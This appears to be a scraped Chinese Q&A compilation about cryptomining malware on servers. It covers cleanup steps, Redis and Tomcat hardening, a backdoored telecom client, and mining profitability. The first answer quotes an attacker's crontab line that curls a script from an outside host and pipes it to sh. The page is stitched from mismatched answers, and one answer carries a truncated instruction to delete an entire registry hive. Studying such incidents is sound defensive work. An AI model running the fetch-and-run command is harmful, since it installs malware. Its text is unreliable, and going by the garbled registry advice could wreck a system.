挖矿阻塞远程连接
① 阿里云服务器被挖矿了怎么办(纯纯电脑小白
1. 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3. pkill minerd ,杀掉进程
4. service stop crond 或者 crontab -r 删除所有的执行计划
5. 执行top,查看了一会,没有再发现minerd 进程了。
6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:
View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:
1. 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号
3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.
② 挖矿会被电信公司发现
不确定,中国电信江苏分公司校园门户网站(pre.f-young.cn)提供下载的“天翼校园客户端”被植入后门病毒,该病毒可接受黑客远程指令,利用中毒电脑刷广告流量,同时也会释放“门罗币”挖矿者病毒进行挖矿。用户在安装“天翼校园客户端”之后,就会在安装目录中自动释放speedtest.dll文件,也就是病毒的本体,所有执行下载、释放其他病毒模块等操作都由这个文件进行。广告刷量模块被执行后,它会创建一个隐藏的IE窗口,然后开始读取云端指令,在后台模拟用户操作鼠标、键盘点击刷广告。为了让用户不察觉这一情况,还屏蔽了声卡播放广告页面中的声音。
另外的病毒挖矿模块,在分析之后发现所挖的是“门罗币”,这是一种类似于“比特币”的数字虚拟货币,每杖价格约500元。当病毒模块开始“挖矿”时,计算机CPU资源占用量明显飙升,导致电脑性能变差,发热量上升,同时电脑风扇也会高速运行,电脑噪音也会随之增加。最后还发现,一款签名为“中国电信股份有限公司”农历日历(Chinese Calendar)同样存在该后门病毒。一般来说,像电信这样大型企业公司的签名应该不会存在什么问题,这次被植入病毒确实让人觉得有些奇怪,但究竟是怎么被植入的,目前还没有结果。
比特币介绍:
一、比特币的发行和交易的完成是通过挖矿来实现的,它以一个确定的但不断减慢的速率被铸造出来。每一个新区块都伴随着一定数量从无到有的全新比特币。境外很多人以挖矿为生,但是在境内是不允许的,目前有关部门对此内容采取严打态势。在家里利用电脑挖矿,如果没有大量用电的情况下,一般不会被供电局调查;如果耗电比较严重,又或者是有偷电行为,就有可能被供电局调查。到时候就不仅仅是被罚款那么简单了,还有可能承担刑事责任。
二、工业互联网平台和智能设备成为网络威胁的重要目标。据国家工业信息安全发展研究中心监测,第二季度我国境内共有22个工业互联网平台提供服务,针对这些工业互联网平台的、来源于境外的网络攻击事件共有656起,涉及北京、重庆、湖南、内蒙古等地区;新增工业控制系统漏洞115个,涉及罗克韦尔、西门子、施耐德电气等品牌的71款产品;我国境内感染工业互联网智能设备恶意程序的受控IP地址共有52.7万余个,受控IP地址数量在1万个以上的僵尸网络共有13个。
③ 关于比特币矿工的问题! 我一哥哥投资了一百多万弄了一百台挖矿机,找的人帮忙看着的,每天就是弄个远程
矿机回本的周期受算力,机子成本,电费,托管费和币价的影响,其中最主要的影响为币价,在未来币价上涨越快,回本周期就越短,以目前市场主流机器,鑫威B3为参考
最新数据 最新鑫威B3超频比特币矿机 算力12T 功率2150W
按照0.00228单台每日均值计算 1台一日可以获得0.00228个比特币
每日收益:0.00228*50000(取整数计算)=114元
成本:1.电费:2.150*24*0.28*1=14.448元
2.托管费:114*20%=22.8元
净收益:114-14.448-22.8=76.752元
月收益:76.752*30=2302.56元 月收益率:19.188%
年收益:76.752*365=27630.72 年化收益在230.256%
④ 我的比特币挖矿机一直是正在连接 请问为什么
换个矿池试试,看情况应该是你所在的矿池出问题了,而且现在不晓得你机器的算力,现在的计算难度是九亿多要是你机器的算力低于20G进不去矿池是很正常的,要是显卡机器就更正常了,采用我的答案不行的话我可以给你远程。
⑤ 挖矿病毒怎么排查
登录系统查看任务管理器,查看占用内存较大且无法关闭的进程。进程上点击鼠标右键,打开文件位置(先要在文件夹选项中选择显示隐藏文件及操作系文件)。此时你可能会看到有一个Systmss.exe进程和模仿操作系统的svchost.exe进程这里还可以看到一个2.bat文件,右键编辑打开这个文件查看,可查看到恶意进程与哪个挖矿组织通信。
通过查看系统操作日志可分析出病毒的来源、启动时间等信息,一般原因可能是未关闭3389端口且使用了弱密码导致黑客远程登录上次病毒。
根除病毒:将病毒可执行文件Systmss.exe重命名为Systmss.exe1使病毒无法执行,此时可从任务管理器停止进程。打开注册表编辑器删除HKEY_LOCAL_整个目录。
如果是Linux系统请参考:网页链接
⑥ 求助服务器被挖矿程序入侵,如何排查
新客户于最近向我们SINE安全公司咨询,说他的服务器经常卡的网站无法打开,远程连接
服务器的慢的要命,有时候PING值都达到300-500之间,还经常掉包,听客户这么一说,一般
会判断为受到了CC+DDOS混合流量攻击,再具体一问,说是机房那面没有受到流量攻击,这
就有点奇怪了,不是流量攻击,还导致服务器卡,网站无法打开,这是什么攻击?为了解决客
户服务器卡的问题,我们随即安排安全工程师对他的Linux服务器进行了安全检测与安全部署。
挖矿木马还设计了挖矿进程如果被客户强制停止后,会自动启动继续挖矿,达到不间断的挖矿,
仔细检查发现是通过设置了每个小时执行任务计划,远程下载shell挖矿木马,然后执行,检查
当前进程是否存在,不存在就启动挖矿木马,进行挖矿。
对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据,以及感染蠕虫的病
毒,如果数据被加密那损失大了,客户是做平台的,里面的客户数据很重要,找出挖矿木马后,
客户需要知道服务器到底是如何被攻击的? 被上传挖矿木马的? 防止后期再出现这样的攻击
状况。
通过我们安全工程师的安全检测与分析,发现该服务器使用的是apache tomcat环境,平台的开
发架构是JSP+oracle数据库,apache tomcat使用的是2016年的版本,导致该apache存在严重
的远程执行命令漏洞,入侵者可以通过该漏洞直接入侵服务器,拿到服务器的管理员权限,
SINE安全工程师立即对apache 漏洞进行修复,并清除木马,至此问题得以解决,客户服务器
一切稳定运行,网站打开正常。
⑦ 挖矿 没服务
根据某安全公司安全威胁检测到在2019年中,恶意软件拦截量为181.07亿次,其中挖矿类恶意软件感染占比最多(58%),其次为远程木马(占比14%),企业或组织内文件共享等机制也使得感染型病毒的比例在9%左右。恶意软件一哥挖矿软件攻击势头非常猛,加密货币挖矿流量较去年增长约100%,在类型上也趋向隐性更好的币种,隐蔽性更好的无文件挖矿也给企业或组织带来了严峻的考验。
由于挖矿对计算机的性能要求比较高,老谋深算的矿工就把罪恶的双手伸向了企业,通过各种手段入侵到各个单位的内网,运行挖矿程序,利用别人的计算资源挖矿,自己坐享其成,的确是高手高手高高手。如何快速地识别内网中是否有挖矿成为了当下网络环境中重要的环节,可以从以下几个方面快速定位.查看任务管理器计算机一旦执行了挖矿程序,会占用大量的CPU资源,CPU占用100%,此时服务器就会变得异常卡顿。Linux执行top命令查看当前进程负载,可以看到这个watchbog的进程CPU占用100%,而Linux的正常进程是watchdog,很明显,这个进程是黑客估计混淆视听的。2.查看计划任务&启动项攻击者成功入侵后,一般都会设定计划任务或启动项,这样每次重启机器后都会自动启动挖矿程序。Windows:从任务管理中可以看到,有一条使用powershell执行的命令,每5分钟执行一次
PoS(Proof of Stake)挖矿:其实是模仿 PoW 算力挖矿,持币人可以将 Token(相当于算力挖矿中的算力)抵押给验证人节点(大多是钱包方,或者交易平台。),来获得节点奖励分红。不同的 Token,由于其机制的不同,获得的收益可能完全不同,但是,这里并不是收益越高越好,还要考虑代币的价值,因为代币抵押后,解锁也需要花十多天时间(为了降低代币的流通量)。要知道,在这个行业,一天 Token 价格的波动可能就会抵消掉你的 挖矿奖励。所以 一定要慎重,选择出自己非常看好的 Token 才做 ,否则可能得不偿失。
⑧ 如何用Linux服务器挖矿教程
今天早上起来一看,服务器脚本一个都没有启动!甚是奇怪,远程登录服务器,也是异常的卡,直到最后卡死,只好重新启动服务器!
启动之后没一会又会变卡,越来越卡,top查看进程!不觉又奇怪的进程,因为平常也不经常看!所以自己也搞不明白怎么回事儿!只好到群里问了问,说是被挖矿的挂了木马文件了,是由于redis的漏洞!
后来我自己发现,原来redis远程可以直接登录,原以为redis和mysql不开放登录权限就不会支持远程登录呢,看来是我想多了
看了好长时间才发现一个异常的进程,自启的进程 molibe !
找到进程位置 ps -ef|grep molibe ;
在tmp目录下,打开一看的确是有
chmod -x molibe 取消执行权限在来到/var/spool/cron下,cat root 查看定时器的执行发现之前脚本都被改了,顾不得删除cron,service crond restart 重新启动,再有就时kill 掉molibe进程
这样大概整个就结束了!但是根本是因为redis漏洞,所以还是补上吧
首先修改redis'端口,找到redis.conf文件 port **** 修改端口号再有就是必须修改密码 # requirepass ******** 去除#号重新启动 /redis/src/redis-server /redis/redis-conf
启动成功之后
redis/redis-cli -p ****(端口) -a *****(密码)
⑨ 路由器挖矿,麻烦帮我看一下怎么弄
确认这个是挖矿吗?
矿机主要是由高规格的显卡组合来进行运算挖矿的,跟路由器性能没多大关系
这个路由器是小米MINI,外加一个自己利用笔记本硬盘组装的移动硬盘,用途无非就是利用小米自家的路由器系统组件个人的NAS服务器,远程查看文件,远程下载什么的,和挖矿没一点关系
之前小米路由器有一个出售自己闲置网速挣钱的路由器插件,但是回本比较慢,没什么用
综合来说,你提供的图和挖矿没多大关系